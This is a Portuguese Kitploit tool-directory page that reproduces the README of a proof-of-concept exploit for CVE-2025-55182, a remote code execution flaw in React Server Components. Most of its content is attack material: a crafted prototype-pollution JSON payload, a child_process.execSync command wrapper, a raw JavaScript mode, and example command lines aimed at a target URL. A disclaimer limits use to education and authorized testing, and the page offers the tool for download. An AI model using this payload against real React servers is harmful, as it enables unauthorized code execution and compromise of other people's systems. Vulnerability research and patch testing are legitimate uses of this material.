Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
react-ssr-vulnerability — Este é um script de POC para CVE-2025-55182 (React SSR RCE) | Kitploit
Ferramentas/GitHubGitHub/darker-ink/react-ssr-vulnerability
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubdarker-ink/react-ssr-vulnerability

react-ssr-vulnerability

Este é um script de POC para CVE-2025-55182 (React SSR RCE)

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 8 mesesAinda não revisado

CVE-2025-55182 - Prova de Conceito de RCE em React Server Components

Esta é uma Prova de Conceito (PoC) apenas para fins educacionais e de pesquisa em segurança. Esta vulnerabilidade foi corrigida nas versões mais recentes dos pacotes afetados. Utilize esta ferramenta apenas em sistemas que você possui ou para os quais tenha permissão explícita para testar. Não me responsabilizo por quaisquer ações legais tomadas contra você.

Construção do Payload

O exploit cria um objeto JSON especialmente elaborado que abusa da cadeia de protótipos do JavaScript:

root@kitploit:~
{
  "then": "$1:__proto__:then",           // Polui a cadeia de protótipos
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": jsCode,                    // Código malicioso injetado
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

Encapsulamento de Comandos

O PoC suporta dois modos:

Modo Padrão (padrão):

root@kitploit:~
process.mainModule.require("child_process").execSync("YOUR_COMMAND");

Encapsula comandos de shell para execução via child_process do Node.js.

Modo Raw (flag --raw):

root@kitploit:~
// Executa JavaScript arbitrário diretamente

Permite a execução direta de código JavaScript sem encapsulamento de comando de shell.

Uso

Execução Básica de Comando

root@kitploit:~
bun run index.ts <arquivo_de_comando> <url_alvo>

Exemplo:

root@kitploit:~
# Crie um arquivo de comando
echo "whoami" > cmd.txt

# Execute contra um endpoint vulnerável
bun run index.ts cmd.txt http://localhost:3000

Modo JavaScript Raw

root@kitploit:~
bun run index.ts --raw <arquivo_js> <url_alvo>

Exemplo:

root@kitploit:~
# Crie um payload JavaScript
echo "require('fs').writeFileSync('/tmp/pwned.txt', 'RCE Success')" > payload.js

# Execute JavaScript raw
bun run index.ts --raw payload.js http://localhost:3000

Argumentos

  • <caminho_do_arquivo>: Caminho para o arquivo contendo o comando ou código JavaScript
  • <url_alvo>: URL do endpoint da React Server Function
  • --raw: (Opcional) Executa JavaScript raw em vez de comandos de shell

Atribuição

Descoberto por: Lachlan Davidson
Divulgado por: Equipe React e Meta Security

Referências

  • Comunicado de Segurança Oficial do React
  • CVE-2025-55182
Baixar ferramenta